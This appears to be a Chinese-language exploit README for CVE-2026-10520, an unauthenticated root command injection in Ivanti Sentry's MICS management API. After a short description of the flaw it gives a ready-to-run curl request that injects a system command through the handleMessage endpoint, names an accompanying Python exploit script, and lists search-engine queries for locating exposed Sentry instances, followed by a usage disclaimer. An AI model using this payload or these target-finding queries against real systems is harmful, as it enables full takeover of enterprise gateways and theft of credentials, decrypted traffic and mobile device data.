Ivanti Sentry(原 MobileIron Sentry)是一款企业安全网关,它代理移动设备与企业后端资源(电子邮件、SharePoint 和内部 Web 应用程序)之间的流量。它强制执行 移动设备管理(MDM)策略,终止加密移动会话,并为企业应用部署签发基于证书的身份验证。Sentry 实例通常面向互联网运行在 8443 端口上,暴露 MICS(Mobile Iron Configuration Service)管理 API。
CVE-2026-10520 是一个未经身份验证的操作系统命令注入漏洞,影响 R10.5.2、R10.6.2 和 R10.7.1 之前的 Ivanti Sentry 版本(CVSSv3.1:10 严重,列入 CISA KEV)。该漏洞位于 MICS API 的端点 /mics/api/v2/sentry/mics-config/handleMessage,该端点通过 URL 编码的 message POST 请求体接收 XML 封装的系统命令,且没有任何身份验证或输入验证。攻击者只要能够访问到存在漏洞的端点,就可以以 root 身份执行任意操作系统命令,从而完全控制主机——包括解密的企业流量、存储的凭据以及所有受管理的移动设备数据。
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
-H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: close" \
--data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"
python CVE-2026-10520-X7.py
title:"Ivanti System Manager: Sign In"body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443本仓库及其内容严格仅供合法的安全研究、授权的渗透测试、教育学习以及防御目的使用。通过访问或使用此材料,您确认已完全负责确保您的活动符合所有适用法律,并且您已在测试或将这些技术应用于任何非您拥有的系统之前获得了适当的授权。
本项目作者和维护者不对因使用此信息而导致的任何损害、法律后果或滥用承担任何责任。任何用于未经授权访问、恶意活动或非法目的的行为均被明确禁止且不予支持。
请负责任地使用。遵守法律。仅测试您拥有或已获得明确书面许可的系统。
SCT-PL